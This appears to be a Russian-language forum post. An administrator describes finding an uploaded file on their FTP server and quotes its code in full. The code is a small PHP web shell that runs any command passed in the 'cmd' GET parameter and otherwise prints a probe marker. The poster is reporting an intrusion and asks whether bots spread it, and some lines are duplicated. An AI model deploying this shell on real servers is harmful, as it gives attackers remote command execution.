Обнаружил сабж в корне своего FTP-сервака. Анонимный доступ запрещен, все пароли сложные.
Создали вполне легально (т.е. логин был успешен). Код:
т.е. обычный шелл. Заюзать его особо не заюзаешь (фтп и веб зоны разделены жостко), а вот интересно кто эту ботву "рассылает". Может автомат какой?
Создали вполне легально (т.е. логин был успешен). Код:
Код |
---|
<?php $cmd=$_GET['cmd']; if (isset($cmd)) { echo system($cmd); } else { if(ini_get('safe_mode')){ echo "allyourbasebelongstous_"; } else { echo "allyourbasebelongstous"; } } ?> |
т.е. обычный шелл. Заюзать его особо не заюзаешь (фтп и веб зоны разделены жостко), а вот интересно кто эту ботву "рассылает". Может автомат какой?